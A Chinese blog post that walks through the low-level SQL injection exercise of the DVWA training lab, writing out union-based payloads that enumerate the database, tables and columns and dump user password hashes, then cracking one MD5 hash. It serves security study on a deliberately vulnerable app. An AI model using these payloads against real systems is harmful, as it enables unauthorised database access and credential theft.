DVWA平台测试之SQL注入low

最新推荐文章于 2022-07-19 09:14:23 发布
最新推荐文章于 2022-07-19 09:14:23 发布
阅读量358 收藏 1
点赞数
分类专栏: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AmyBaby00/article/details/100987070
版权

网络安全学习笔记,仅限学习交流
不得利用、从事危害国家或人民安全、荣誉和利益等活动

测试环境与工具:
测试平台:DVWA,下载地址:http://down.51cto.com/data/875088,也可下载metaspolit-table2虚拟机,里面已经部署好了dvwa.。
渗透工具:burpsuite-1.4.07下载地址:http://down.51cto.com/data/875103
首先我们介绍下DVWA和Burpsuite,DVWA这是一个php+mysql平台构建的预置web常见漏洞的渗透练习平台。能够帮助web应用安全研究人员很好了解web漏洞。Burpsuite是一款功能强大的web渗透测试工具。

SQL注入漏洞在OWASP TOP 10威胁中,一直排名第一,安全威胁可见一斑。SQL注入渗透测试过程中,针对不同的数据库平台,注入语句选择也不同,本篇笔者主要测试mysql注入的常用语句以及渗透思路。

登录访问DVWA,默认用户名:admin密码:password.

1.选择难度级别 Low
在这里插入图片描述
2. 输入1.正常显示。 1’ 报错,根据报错内容判断为’闭合
在这里插入图片描述在这里插入图片描述

Order by 判断 表的列数

在这里插入图片描述

3.union 联合查询语句 爆出数据库
1’ union select 1,database() #
数据库名为:dvwa
在这里插入图片描述
union 联合查询,连接2个语句,
但先执行第1个,
如果显示位只有1处,那么第2个语句结果无法显示
所以,输入id=-1 语句正确,但无法显示
那么,显示位即显示第2个语句结果

在这里插入图片描述
数据库版本号:
5.0以上版本,有information_schema.tables。包含所有的数据库信息
1’ union select 1,version() #
在这里插入图片描述

测试连接数据库权限:
1’ and ord(mid(user(),1,1))=114 #
返回正常说明为root
在这里插入图片描述

  1. 爆出数据库中的表名
    1’ union select 1,table_name from information_schema.tables where table_schema=‘dvwa’#
    在这里插入图片描述
    5.爆出users字段名
    1’ union select 1,column_name from information_schema.columns where
    table_name=‘users’ 在这里插入图片描述
    6.爆出用户名和密码,对应user和password
    1’ union select user,password from users #
    在这里插入图片描述
    密码进行了加密处理,需md5解密
    用户名:admin
    密码:5f4dcc3b5aa765d61d8327deb882cf99
    解密为:password
    在这里插入图片描述
YANG公子
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA平台Sql注入
林林木林林L的博客
03-10 431
Sql注入模块 输入一个数字,然后submit F12查看Cookies 打开sqlmap,输入命令,查看数据库 查表 查表里数据 查看字段的数据 Sql手工注入 上面用的是sqlmap获取数据库信息,现在使用手工注入获取数据库的信息。 思路: 1.判断是否存在注入注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 ...
DVWASQL手工注入
编程界菜姬的博客
06-02 1233
1.注入思路1.判断是否存在注入注入的类型是字符型、数字型还是搜索型2.猜解 SQL 查询语句中的字段数3.确定显示的字段顺序4.获取当前数据库5.获取数据库中的表6.获取表中的字段名7.查询 ...
DVWAsql注入low
m0_52923241的博客
03-12 525
SQL injection 先尝试输入1,可以得到正常的回显 尝试输入User ID:1’判断是否存在注入 可以判断出sql 遍历数据库表
dvwasql盲注
BAIXUAN9527的博客
03-27 160
dvwa-sql盲注
01mx的博客
02-05 436
SQL盲注 VS 普通SQL注入: 普通SQL注入: 1.执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等 2.一般在页面上直接就会显示执行sql语句的结果 SQL盲注:(不显示错误信息,不能在前端显示) 1.一般情况,执行SQL盲注,服务器不会直接返回具体的数据库错误or die语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的盲注) 2.一般在页面上不会直接显示sql执行的结果 3.有可能出现不确定sql是否执行的情况 SQL盲注-测试流程 1.
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
十三、kali windows DVWA搭建及测试
01-15
DVWA是OWASP的项目,提供了一个安全脆弱的环境,涵盖了多种漏洞类型,包括SQL注入、命令执行、文件上传等。通过学习和测试这些漏洞,安全专家和开发者能更好地理解如何防止和修复它们。搭建DVWA所需的环境是WAMP...
软件安全实验2 SQL注入实验
最新发布
06-19
DVWA目前的版本共有十个漏洞模块,分别是Brute Force(暴力破解)、Command Injection(命令行注入)、CSRF(跨站请求伪造)、File Inclusion(文件包含)、File Upload(文件上传)、Insecure CAPTCHA (不安全的...
DVWA靶场搭建与使用
09-02
它提供了多种安全漏洞的模拟场景,包括SQL注入、跨站脚本(XSS)、文件包含、命令注入等,帮助用户提升对Web应用安全的理解。 **一、DVWA靶场环境准备** 在搭建DVWA之前,你需要一个支持PHP和MySQL的运行环境。常见...
网络安全原理与应用:SQL工具注入.pptx
05-16
实际应用中,如DVWA(Damn Vulnerable Web Application)平台的安全实验,可以模拟SQL注入环境进行实战练习。首先,将DVWA的安全级别设置为Low,然后在SQL Injection模块中尝试注入获取URL,并使用SQLMap进行测试...
DVWAsql注入漏洞-low
m0_63735735的博客
07-19 1667
DVWAsql注入漏洞-low
关于davwa的SQL注入时报错:Illegal mix of collations for operation ‘UNION‘原因剖析与验证
qq_43696276的博客
06-10 1116
在进行dvwa靶场注入时,发现出现这里出现了一些bug:Illegal mix of collations for operation ‘UNION’ 经过查询与验证后,解决并分析了这一问题。
Metaspolit使用简介
weixin_30940783的博客
06-14 1434
信息收集阶段 Whois信息收集 msf auxiliary > whois baidu.com 域名信息查询阶段 msf auxiliary > nslookup www.baidu.com msf auxiliary > dig @114.114.114.114 www.baidu.com 主机端口探测阶段 直接使用PING命令探测连通性 ping 1.2.3.4 ...
dvwa学习sql注入 low级别
过客璇璇的博客
03-11 5255
刚刚学习web安全,老师第二节课就让用dvwa学习sql注入了,下面是我自己通过书上的学习以及在dvwa摸索的过程,求大牛们多多指点,勿要喷我级别:Low从页面上看到,有一个可以提交查询内容的地方我们可以通过以下步骤判断这里是否存在注入点① 输入1  提交②输入1' 提交③输入1 and 1=1 提交④输入1 and 1=2提交由上可以看出是存在注入点的,  我们猜测sql查询语句是这样的:  s...
DVWA 爆破 HIGH
m0_46315342的博客
07-10 510
high模式下多了一个token,token放在隐藏input的value中,如果再用low模式的爆破方法就不行了,因为token是变化的,这个时候需要绕过token。 直接推荐一个博客把:DVWA 爆破 HIGH 这个博客前面几行还有个low级别的,不过high级别的讲的很清楚。 有一个要注意的地方:抓完包之后不要把poxy里面的intercept给关了,不然在设置token的时候会出错。 ...
SQL注入攻击(DVWA平台演示)
Olivia_2的博客
07-24 1789
一、SQL注入攻击介绍 SQL注入攻击是指构建特殊的输入作为参数传递给应用程序,这些参数属于SQL语法里的一些组合。这些参数插入到SQL语句中,破坏了原有的SQL语句的结构,通过SQL语句的执行,进而实现攻击者所要的操作。SQL注入攻击的对象是后端服务器的数据库系统。 二、实验环境 Win7操作系统DVWA平台 三、DVWA演示SQL注入攻击 1、进入DVWA的登录首页(首页网址:http://localhost/DVWA-master/login.php)后,输入账号admin和密码passw
sqli-labs与dvwa平台
xiaotaotao666的博客
05-18 748
sqli-labs学习和DVWA www.alittt.cn 线上的学习平台 我有线上自己搭建好的sqli-labs和dvwa平台,可以直接线上学习使用,不需要自己电脑搭建。 搭建sqli-labs 使用phpstudy一键搭建服务器,然后从https://github.com/Audi-1/sqli-labs下载源代码,放到phpstudy下的www文件夹下。 打开sql-connections文件夹下的“db-creds.inc”文件 修改mysql用户名和密码为你自己的。 然后浏览器访问127.0.0
使用dvwa进行SQL注入的练习
热门推荐
不忘初心,护天下安全!
01-01 1万+
SQL注入 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。比如先前的很多影视网站泄露VIP会员密码大多就是...
DVWA漏洞测试SQL注入
JBlock的博客
11-08 4672
我们已经在前面讨论过sql注入漏洞产生的原因和一些绕过waf的技巧。今天话不多说直接上测试:首先我们先理清手工注入思路: 1.判断是否存在注入注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.下载数据LOW级别必须的第一步,看源码:<?php if( isset( $_REQUEST[
DVWA中的SQL注入攻防实战指南
"DVWA(Damn Vulnerable Web ...DVWASQL注入练习帮助我们理解攻击者的思路,提高对SQL注入漏洞的认识,并学习如何防止这类攻击。通过这样的实践,我们可以提升Web应用的安全性,避免潜在的数据泄露和系统破坏。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值